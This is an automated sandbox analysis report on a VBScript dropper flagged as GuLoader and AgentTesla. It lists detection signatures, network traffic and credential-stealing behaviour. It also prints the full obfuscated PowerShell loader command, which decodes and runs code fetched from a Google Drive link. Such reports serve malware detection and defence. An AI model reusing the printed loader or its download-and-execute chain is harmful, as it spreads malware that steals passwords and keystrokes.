Windows Analysis Report
TRANSPORT_INSTRUCTION_MR.vbs

Overview

General Information

Sample name: TRANSPORT_INSTRUCTION_MR.vbs
Analysis ID: 1430125
MD5: 1afdbe303941cc8155f48c9b61bd3df4
SHA1: d141b2f53f5679299bcd802791697bc831dd0a98
SHA256: 4667d2988c844cd2bfc3e983f1106c37cd196376a43d4fddcc278fab87ea8e0c
Tags: Formbookvbs
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for domain / URL
Source: mail.myhydropowered.com Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for submitted file
Source: TRANSPORT_INSTRUCTION_MR.vbs Virustotal: Detection: 37% Perma Link
Source: TRANSPORT_INSTRUCTION_MR.vbs ReversingLabs: Detection: 28%
Source: unknown HTTPS traffic detected: 142.251.32.110:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.32.110:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: Binary string: ore.pdb source: powershell.exe, 00000007.00000002.2578303091.00000000082D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2578303091.00000000082D0000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: ip-api.com
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000003.00000002.2960827104.0000026D5EFE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: wscript.exe, 00000000.00000003.2110367714.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111079924.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109551833.000001D9941CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1998762736.000001D99629D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989814145.000001D996279000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1990131863.000001D9962A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989700652.000001D99622D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111762406.000001D9961F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989437014.000001D9962A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998511091.000001D99627B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1989814145.000001D996279000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1990131863.000001D9962A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989700652.000001D99622D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2f79ca1147483
Source: wscript.exe, 00000000.00000003.2110367714.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111079924.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109551833.000001D9941CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabD
Source: wscript.exe, 00000000.00000003.1989700652.000001D99622D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989950107.000001D996255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2f79ca1147
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000003.00000002.2805316502.0000026D489B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPskP
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D4710D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D4710D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk&export=download
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47F20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown HTTPS traffic detected: 142.251.32.110:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.32.110:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49718 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_4424.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Listerism.ShellExecute Formule,Anstift,"","" ,Olympiade
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6326
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6326
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6326 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6326 Jump to behavior
Writes or reads registry keys via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj 